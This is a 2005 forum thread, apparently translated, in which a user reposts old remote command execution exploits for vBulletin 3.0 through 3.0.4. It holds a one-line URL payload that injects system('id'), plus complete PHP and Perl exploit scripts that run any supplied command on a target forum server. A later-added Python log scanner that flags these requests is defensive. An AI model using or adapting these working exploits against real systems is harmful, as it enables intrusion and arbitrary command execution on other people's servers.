A-KUEI 10 Posted June 22, 2005

vbulletin 3.0.x execution Exploit:

http://site/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

------------------------------------

vBulletin 3.x "forumdisplay.php" Remote Code ...

```php
#!D:\phpdev\php\php
<?php
/**************************************************************
#
# vbulletin 3.0.x execute command by AL3NDALEEB al3ndaleeb[at]uk2.net
#
# First condition : $vboptions['showforumusers'] == True , the admin must set
# showforumusers ON in vbulletin options.
# Second condition: $bbuserinfo['userid'] == 0 , you must be an visitor/guest .
# Third condition : $DB_site->fetch_array($forumusers) == True , when you
# visit the forums, it must has at least
# one user show the forum.
# Fourth condition: magic_quotes_gpc must be OFF
#
# Vulnerable Systems:
# vBulletin version 3.0 up to and including version 3.0.4
#
# Immune systems:
# vBulletin version 3.0.5
# vBulletin version 3.0.6
#
**************************************************************/

if (!(function_exists('curl_init'))) {
    echo "cURL extension required\n";
    exit;
}

if ($argv[3]){
    $url = $argv[1];
    $forumid = intval($argv[2]);
    $command = $argv[3];
}
else {
    echo "vbulletin 3.0 > 3.0.4 execute command by AL3NDALEEB al3ndaleeb[at]uk2.net\n\n";
    echo "Usage: ".$argv[0]." <url> <forumid> <command> [proxy]\n\n";
    echo "<url> url to vbulletin site (ex: http://www.vbulletin.com/forum/)\n";
    echo "<forumid> forum id\n";
    echo "<command> command to execute on server (ex: 'ls -la')\n";
    echo "[proxy] optional proxy url (ex: http://proxy.ksa.com.sa:8080)\n\n";
    echo "ex :\n";
    echo "\tphp vb30x.php http://www.vbulletin.com/forum/ 2 \"ls -al\"";
    exit;
}

if ($argv[4])
    $proxy = $argv[4];

$action = 'forumdisplay.php?GLOBALS[]=1&f='.$forumid.'&comma=".`echo _START_`.`'.$command.'`.`echo _END_`."';

$ch=curl_init();
if ($proxy){
    curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.'/'.$action);
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
$res=curl_exec ($ch);
curl_close ($ch);
$res = substr($res, strpos($res, '_START_')+7);
$res = substr($res,0, strpos($res, '_END_'));
echo $res;
?>
```

------------------------------------

vbulletin 3.0.4 remote command execution

```perl
#!/usr/bin/perl
# vbulletin 3.0.4 remote command execution by pokleyzz <pokleyzz_at_scan-associates.net>
#
# Requirement:
# showforumusers ON
#
#
# bug found by AL3NDALEEB <al3ndaleeb_at_uk2.net>
#
# usage :
# vbulletin30-xp.pl <forumdisplay.php url> <forum id> <command>
#
# example :
# vbulletin30-xp.pl http://192.168.1.78/forumdisplay.php 1 "ls -la"
#
# !! Happy Chinese new Year !!

use IO::Socket;

sub parse_url {
    local($url) = @_;
    if ($url =~ m#^(\w+):#) {
        $protocol = $1;
        $protocol =~ tr/A-Z/a-z/;
    } else {
        return undef;
    }
    if ($protocol eq "http") {
        if ($url =~ m#^\s*\w+://([\w-\.]+):?(\d*)([^ \t]*)$#) {
            $server = $1;
            $server =~ tr/A-Z/a-z/;
            $port = ($2 ne "" ? $2 : $http_port);
            $path = ( $3 ? $3 : '/');
            return ($protocol, $server, $port, $path);
        }
        return undef;
    }
}

sub urlencode{
    my($esc) = @_;
    $esc =~ s/^\s+|\s+$//gs;
    $esc =~ s/([^a-zA-Z0-9_\-.])/uc sprintf("%%%02x",ord($1))/eg;
    $esc =~ s/ /\+/g;
    $esc =~ s/%20/\+/g;
    return $esc;
}

$url = $ARGV[0];
$fid = $ARGV[1];
$cmd = urlencode($ARGV[2]);
$http_port = 80;

$shellcode ="GLOBALS[]=1&f=$fid&cmd=$cmd&comma={\${system(\$cmd)}}{\${exit()}}";

@target = parse_url($url);

$conn = IO::Socket::INET->new (
    Proto => "tcp",
    PeerAddr => $target[1],
    PeerPort => $target[2],
) or die "\nUnable to connect\n";

$conn -> autoflush(1);

print $conn "GET $target[3]?$shellcode HTTP/1.1\r\nHost: $target[1]:$target[2]\r\nConnection: Close\r\n\r\n";

while (<$conn>){
    print $_;
}

close $conn;
```

------------------------------------

These are all vulnerabilities from a long time ago... I happened to come across them earlier, and since there is so little posted here, just treat this as a filler post = =...
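A defender-side check for the request pattern in the post above, as an added example that is not part of the original post: it scans web access logs for `forumdisplay.php` requests that carry a `GLOBALS` request parameter or a `comma` parameter containing PHP code characters. The log lines, the log-format regex and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed sample access-log lines; addresses are from a documentation range.
SAMPLE_LOG = """\
192.0.2.10 - - [22/Jun/2005:10:01:02 +0800] "GET /forum/forumdisplay.php?f=2 HTTP/1.1" 200 18234
192.0.2.44 - - [22/Jun/2005:10:03:17 +0800] "GET /forum/forumdisplay.php?GLOBALS[]=1&f=2&comma=%22.system('id').%22 HTTP/1.1" 200 19011
192.0.2.44 - - [22/Jun/2005:10:03:40 +0800] "GET /forum/forumdisplay.php?GLOBALS%5B%5D=1&f=2&cmd=id&comma=%7B%24%7Bsystem(%24cmd)%7D%7D HTTP/1.1" 200 412
192.0.2.77 - - [22/Jun/2005:10:05:00 +0800] "GET /forum/search.php?query=comma HTTP/1.1" 200 5120
"""

# Assumed log layout: client address first, quoted request line, then status code.
REQUEST = re.compile(r'^(?P<ip>\S+) .*?"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
# Quotes, backticks, "${" and "(" are what the comma values in the post rely on.
CODE_CHARS = re.compile(r'''["'`]|\$\{|\(''')

def classify(target):
    """Return the reasons a request target matches the pattern, or an empty list."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("forumdisplay.php"):
        return []
    # parse_qsl percent-decodes names and values, so GLOBALS%5B%5D is seen as GLOBALS[].
    params = parse_qsl(parts.query, keep_blank_values=True)
    reasons = []
    if any(name == "GLOBALS" or name.startswith("GLOBALS[") for name, _ in params):
        reasons.append("GLOBALS request parameter")
    if any(name == "comma" and CODE_CHARS.search(value) for name, value in params):
        reasons.append("comma carries PHP code characters")
    return reasons

def scan(log_text):
    """Return (client, status, reasons) for every log line that matches."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST.match(line)
        if not m:
            continue
        reasons = classify(m["target"])
        if reasons:
            hits.append((m["ip"], m["status"], reasons))
    return hits

if __name__ == "__main__":
    for ip, status, reasons in scan(SAMPLE_LOG):
        print(ip, status, "; ".join(reasons))
```

A hit matters on hosts running vBulletin 3.0 through 3.0.4; the post lists 3.0.5 and 3.0.6 as immune.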
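ckmarkhsu 7 Posted June 22, 2005

Which security site did you find this on? This is a pretty old vulnerability, but 深藍's version is even older XDD so it isn't affected ||| If you want to find vulnerabilities, phpBB has plenty more XDD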
A-KUEI 10 Posted June 22, 2005 (Author)

To be honest... I found it in my own folder = = I think I found it around February; as for which site, of course... I forgot = ="....